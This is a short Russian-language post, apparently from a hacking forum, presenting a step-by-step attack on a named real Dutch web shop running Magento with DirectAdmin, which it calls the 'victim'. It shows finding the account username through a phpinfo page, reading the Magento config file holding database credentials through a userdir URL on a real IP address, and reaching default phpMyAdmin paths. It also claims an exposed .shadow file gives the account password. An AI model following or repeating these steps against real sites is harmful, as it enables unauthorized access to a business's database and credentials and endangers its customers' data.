вот пример на Magento+DirectAdmin

жертва: https://www.smitsarnhem.nl/

смотрим пхпинфо или ищем раскрытие путей

https://www.smitsarnhem.nl/phpinfo.php

_SERVER["DOCUMENT_ROOT"] /home/smitsarn/domains/smitsarnhem.nl/private_html

т.е smitsarnявляется нашим юзером, идем дальше...

http://194.247.31.208/~smitsarn/app/etc/local.xml читаем конфиг

phpmyadmin лежит по дефолту всегда:

http://194.247.31.208/phpMyAdmin/

https://www.smitsarnhem.nl/phpMyAdmin/

а дальше уже дело техник....

еще касяк, нам полностью доступна пака /home/%USERNAME%/ где /home/%USERNAME%/.shadow лежит пасс от аккаунта %USERNAME%